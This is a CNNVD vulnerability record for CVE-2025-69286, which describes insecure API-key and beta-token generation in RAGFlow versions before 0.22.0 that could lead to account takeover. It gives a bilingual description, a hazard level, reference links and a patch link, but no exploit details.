CNNVD-202512-5499 Information

Dec 31, 2025 cve

CNNVD ID

CNNVD-202512-5499

CVE-2025-69286

  • CNNVD Published: 2025-12-31

Description (Chinese)

RAGFlow是InfiniFlow开源的一个基于深度文档理解的开源 RAG 引擎。 RAGFlow 0.22.0之前版本存在安全漏洞,该漏洞源于API密钥和beta令牌生成过程中使用不安全的密钥生成算法,可能导致令牌相互派生和账户完全控制。

Description (English)

RAGFlow is an open source RAG engine based on the understanding of an in-depth document. The previous version of RAGFlow 0.22.0 had a security loophole, which stemmed from the use of unsafe key-generated algorithms in the production of API keys and beta tokens, which could lead to the transfer of tokens and full account control.

Hazard Level

High

Vulnerability Type

其他

Affected Vendor

InfiniFlow

Published

2025-12-31

Last Modified

2026-02-24

References

https://github.com/infiniflow/ragflow/blob/v0.20.5/api/apps/system_app.py#L214-L215 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/init.py#L343 https://github.com/infiniflow/ragflow/blob/v0.20.5/api/utils/api_utils.py#L378 https://github.com/infiniflow/ragflow/commit/a3bb4aadcc3494fb27f2a9933b4c46df8eb532e6 https://github.com/infiniflow/ragflow/security/advisories/GHSA-9j5g-g4xm-57w7

Patch

https://github.com/infiniflow/ragflow/releases

Share on: